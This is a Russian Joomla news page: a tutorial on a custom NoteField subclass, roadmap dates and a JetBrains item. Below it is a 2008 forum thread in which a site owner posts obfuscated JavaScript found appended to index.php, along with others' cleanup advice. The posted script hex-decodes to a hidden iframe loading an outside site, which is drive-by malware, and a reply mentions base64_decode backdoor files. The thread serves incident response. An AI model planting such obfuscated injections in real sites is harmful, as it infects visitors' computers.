Новости Joomla

Свои типы полей в Joomla.Это большая тема, о которой можно говорить очень много

Свои типы полей в Joomla.Это большая тема, о которой можно говорить очень много

👩‍💻 Свои типы полей в Joomla.Это большая тема, о которой можно говорить очень много. Самое главное, что возможности применения ограничиваются только вашей больной фантазией. Вы строите интерфейс своего модуля или плагина и вам нужно подтянуть данные из сторонней системы (список чего-нибудь по какому-нибудь API), чтобы сохранить выбранный id в Joomla. Или сделать какую-то проверку и в зависимости от неё показать то или иное сообщение пользователю. Для этого подойдут свои пользовательские типы полей. Интерфейс Joomla по большей части описан в XML-файлах. У каждого из них свои параметры. Некоторые не описаны в документации (manual.joomla.org), поэтому самым любопытным будет полезно заглянуть в собственно файлы фреймворка по пути

libraries/src/Form/FormField.php, а так же в
libraries/src/Form/Fields. У каждого класса поля перечислены его специфические свойства, которые можно описывать в XML. А в своём типе поля вы можете устанавливать эти значения программно. В моём модуле WT Quick links под капотом происходят изменения. Теперь для работы (в админке) ему нужен вспомогательный плагин. А в самом модуле нам бы проверить, а не выключен ли он? В Joomla есть тип поля Note - заметка. Его можно использовать для вывода примечаний.

<field type="note"     name="your_note_for_user"     label="Заголовок примечания"     title="Альтернативный способ для заголовка"     description="Текст примечания"     class="col-12 alert alert-info"     heading="h1"     close="true"/>
heading - указывать уровень заголовка.
close - позволяет закрыть это примечание. В классе поля
libraries/src/Form/Field/NoteField.php описана логика вывода. И в принципе оно нам подходит для нашей задачи. Но оно будет выводить сообщение всегда, а нам нужно только тогда, когда плагин отключён.Поэтому берём и создаём свой класс поля, который мы унаследуем от
NoteField. Это значит, что у нас в руках будет весь инструментарий стандартного поля
Note + то, что мы сами добавим. В XML-манифест добавляем наше поле
<field type="systempluginstatus"      name="systempluginstatus"     addfieldprefix="Joomla\Module\Wtquicklinks\Site\Fields"/>
-
type - имя файла и класса,-
addfieldprefix - указываем namespace к нашему классу, может быть любой нам нужный-
name - нельзя полю без имени...Это означает, что Joomla будет использовать класс поля из файла
modules/mod_wt_quick_links/src/Fields/SystempluginstatusField.php.А в классе поля будет написано следующее:
<?php// namespace для атрибута addfieldprefixnamespace Joomla\Module\Wtquicklinks\Site\Fields;// нельзя напрямую обращаться к этому файлуdefined('_JEXEC') or die;// подключаем родительский класс для переопределенияuse Joomla\CMS\Form\Field\NoteField;use Joomla\CMS\Language\Text;use Joomla\CMS\Plugin\PluginHelper;// имя класса и имя файла точь-в-точьclass SystempluginstatusField extends NoteField{     protected $type = 'Systempluginstatus';     protected function getLabel()          {               // если плагин не включён               if(PluginHelper::isEnabled('system','wtquicklinks')) {                    // меняем свойства родительского класса                    $this->class = 'alert alert-danger w-100';                    $this->element['label'] = '⚠️ А-а-а-а!';                    $this->element['description'] = 'Плагин не включён!!';                    // и просто рендерим его с нашими свойствами                    return parent::getLabel();               }          // А иначе всё хорошо, скрываем поле из виду.          $this->parentclass = 'd-none';          return '';     }}
Просто и удобно. И людям приятно, что о них позаботились и рассказали почему что-то не работает.@webtolkru#joomla #php #webdev #разработка

Обновлена информация в Плане развития Joomla

👩‍💻 Обновлена информация в Плане развития Joomla.Здесь собрана информация о датах релизов, описаны принципы версионирования, указаны ответственные за релизы, а так же даты окончания поддержки релизов. Опираясь на эту информацию вы можете планировать развитие ваших интернет-проектов.👩‍💻 Что нового?⛔️ Joomla 4.Дата окончания исправления ошибок безопасности в версии 4.x - 14 октября 2025г. ⚠️ После этой даты Joomla 4 прекратит получать какие-либо обновления, в том числе безопасности - вообще. Рекомендуем обновить ваши сайты до актуальной Joomla 5.✅ Joomla 5.- Дата окончания исправления ошибок в версии 5.x - 13 октября 2026г.- Дата окончания исправления ошибок безопасности в версии 5.x - 12 октября 2027 года.- Текущая актуальная (на момент написания заметки) версия - 5.3.1.- Опубликовано расписание выхода релизов Joomla 5.4. Стабильный релиз ожидается 14 октября 2025 года.✅ Joomla 6.- Дата окончания исправления ошибок в версии 6.x - 17 октября 2028г.- Дата окончания исправления ошибок безопасности в версии 6.x - 16 октября 2029г.- Опубликовано расписание выхода релизов Joomla 6.0. Стабильный релиз ожидается 14 октября 2025 года.- Для разработчиков уже доступна Joomla 6.0.0-alpha1.✅ Joomla! Framework.Обновлена информация о Joomla! Framework - полноценном PHP-фреймворке для разработки. Он в версиях 1.х и 2.х был самостоятельным параллельным проектом, однако начиная с версии Joomla 4.0 стал её основой. Добавлена информация о Joomla! Framework 3.x, который вышел 6 октября 2023 года. Его можно использовать в тех случаях, когда вам в проекте не нужна CMS Joomla целиком.Подробнее на сайте Joomla-сообщества Joomlaportal.ru#joomla #community

Компания JetBrains рассказала о своей поддержке Joomla

Компания JetBrains рассказала о своей поддержке Joomla

JetBrains - один из мировых лидеров в разработке программного обеспечения для разработчиков. Её программные продукты - это IDE - профессиональные среды разработки, которые отличаются от простого блокнота/редактора с плагинами набором всевозможных инструментов для разработчиков, глубоким анализом кодовой базы, подсказками по ней и по языку программирования, отладкой ошибок и многим-многим другим. Одним из самых известных продуктов компании является IDE PHP Storm, который можно назвать отраслевым стандартом PHP-разработчика.

В статье How PhpStorm Helps Maintain PHP Open-Source Projects: Interviews and Real-World Examples в блоге компании описываются Open Source проекты, которым JetBrains оказывает поддержку (это могут быть бесплатные лицензии для разработчиков для некоммерческих проектов).

В список попали:

  • PHPUnit - фреймворк для unit-тестирования в PHP
  • Doctrine DBAL - библиотека для PHP, которая предоставляет лёгкий и гибкий слой для коммуникации с базой данных. Она поддерживает различные базы данных через единый и согласованный API.
  • CodeIgniter — популярный MVC-фреймворк для разработки на PHP
  • Joomla! - наша любимая CMS.

Эти названия (кроме "Joomla") чаще всего не слышат вебмастера и разработчики обычных сайтов и интернет-магазинов. Но эти названия хорошо знакомы PHP-разработчикам, которые создают сложные и высоконагруженные проекты и микросервисы. То, что Joomla оказалась в одном ряду с такими программными инструментами - делает ей честь.

🙏 За ссылку спасибо участнику нашего сообщества Ринату Кажетову (@rkazhet).

Подпишитесь на @joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 2492 Просмотров
*

annik

  • Осваиваюсь на форуме
  • 39
  • 2 / 1
index.php + JS в конце
« : 16.06.2008, 10:59:10 »
Чем можно расшифровать?
Код
script type="text/javascript">

</script><script>function v485549d407dae(v485549d408198){ var v485549d40857f=16; return(parseInt(v485549d408198,v485549d40857f));}function v485549d408d4d(v485549d409133)var v485549d4095b4='';for(v485549d409905=0; v485549d409905<v485549d409133.length; v485549d409905+=2){ v485549d4095b4+=(String.fromCharCode(v485549d407dae(v485549d409133.substr(v485549d409905, 2))));}return v485549d4095b4;} document.write(v485549d408d4d('3C696672616D65206E616D653D2734623627207372633D27687474703A2F2F6B616B6173686B612E7573272077696474683D353530206865696768743D3436207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
Дописали мне в конце index.php
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: index.php + JS в конце
« Ответ #1 : 16.06.2008, 11:03:44 »
А смысл расшифровывать? Дописал это робот, который обходит сайты по ftp, используя данные, украденные с помощью троянов. Как правило дописываемый код имеет целью дальнейшее распространение трояна на компьютеры посетителей сайта.

Как от этого избавиться в принципе не раз уже на форуме писалось.

1. Сделать полную проверку компьютера, имеющего доступ по ftp к зараженному сайту на вирусы и трояны, до тех пор, пока не найдете и не вылечите.
2. Сменить пароль на ftp
3. Восстановить файлы сайта из последнего бекапа перед заражением (при условии что бекап производится регулярно)
4. В дальнейшем активно использовать антивирус, не забывать обновлсять ПО и не хранить пароли в программах для работы с FTP...
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: index.php + JS в конце
« Ответ #2 : 16.06.2008, 11:53:08 »
Полностью восстанавливать наверно не стоит, у меня таже самая проблема была. решилось просто. Просмотр всех файлов index.php в шаблонах сайта и админки, index.php в корне сайта и в корне админке. Поставить на них права 555
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #3 : 16.06.2008, 13:37:14 »
2 дня борюсь с той же проблемой.
Стоит:
Joomla! 1.0.12
Register Globals: OFF 
Register Globals: OFF 
Magic Quotes: ON 
Safe Mode: OFF 
File Uploads: ON 
Session auto start: OFF 

444 - chmod на index.php в templates
.....
по логам обнаружила что с IP вредоносного и гадосного врага подгрузили /administrator/components/com_banners/banners.html.php где были пароли на вход в админку
 и потом сколько я не удаляля его прописаные JavaScript c трояном  он мне демонстративно их вставлял и еще и показывал, что chmod он тоже может поменять без моего ведома.

Мои действия:
1.Заблокировала IP
2. почистила и провелила на наличие посторонних файлов не входящих в ранее в мою сборку сайта
3. еще раз перезалила папку templates и еще раз поставила 444 - chmod
4. заодно проверила inframe - не нашла
5. поменяла FTP пароли (каюсь, хранила в клиенте-ленивая......)
6. сижу и проверяю касперским компьютер (Вопрос: заканчивается лицензия на Касперского. Стоит ли и дальше им пользоваться или перейти на другой, но какой?)

 >:( :( :o
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: index.php + JS в конце
« Ответ #4 : 16.06.2008, 13:42:22 »
Вопрос: заканчивается лицензия на Касперского. Стоит ли и дальше им пользоваться или перейти на другой, но какой?)
Если он вас устраивает, я бы ничего не менял. А в дополнение к Касперскому поставил бы допустим что-то типа TrojanRemover и периодически проверял бы еще им...

p.s. У самого правда стоит бесплатный AVG, перед этим месяца 2 стоял бесплатная версия Avira... но подумываю перейти на касперского...
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #5 : 16.06.2008, 13:54:04 »
Да, проблема то в том, что и у меня он пока безплатный до этого стоял докторвеб+ комодо и я нахваталась......А касперский реально поттормаживает работу в интернете...Перестала т.е. почти нет возможности принять почту gmail/

К предыдущему вопросу...как проверить свои компоненты на наличие дыр...
И RequestFilter можно ставить на 1.0.12?
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: index.php + JS в конце
« Ответ #6 : 25.06.2008, 12:35:07 »
Снова обнаружился взлом одного из сайта. В этот раз index.php не был затронут. Были затронуты index.html.
Действия те же, удалить неизвестные скрипты и поставить 555 на эти файлы.
От троянцев помог AVG. Он единственный нашел у меня 113!!!! троянцев на компе
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #7 : 30.06.2008, 16:59:04 »
Сегодня опять 25....ап и снова Касперский вопит на троян. И вроде все сделала правильно (ну как тут советовали) . НО не проверила ядро на backdoor и shells. Сделала, когда посмотрела логи и увидела куда ломаются.
И что оказалось, на самом то деле меня еще 3 месяца назад взломали....- понапихивали файликов ну очень похожих на "взаправдашие", но по сути ПАКОСТЬ редкая. Проверила на содержание подобной строки типа echo(base64_decode  ......и  АП, есть такие.
Очень поучительно почитать форум antichat.ru - ПОВБИВАЛА!!! Но полезно.
Вывод - надо предохраняться!!!! И прежде всего дыры это ошибка админа или халатность. Но получается полная параноя.

P.S. Извините за эмоциональность!!! 2 часа жизни под хвост!!!!

Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

В файле index.php постоянно появляется вредоносный код

Автор Armal

Ответов: 29
Просмотров: 3875
Последний ответ 08.05.2021, 16:16:32
от gartes
Запретить смену прав на index.php - Joomla

Автор magrychev

Ответов: 5
Просмотров: 2649
Последний ответ 24.10.2017, 21:14:24
от winstrool
Добавляется адрес к index.php

Автор kokon_zver

Ответов: 8
Просмотров: 1994
Последний ответ 21.11.2016, 10:34:29
от Дмитрий_76
htaccess и htpasswd пароль только на url с параметром например "index.php?test"

Автор ice99

Ответов: 4
Просмотров: 1726
Последний ответ 28.08.2016, 20:52:51
от flyingspook
Количество файлов index.php

Автор kouichiro

Ответов: 13
Просмотров: 1445
Последний ответ 04.04.2016, 07:06:10
от Morh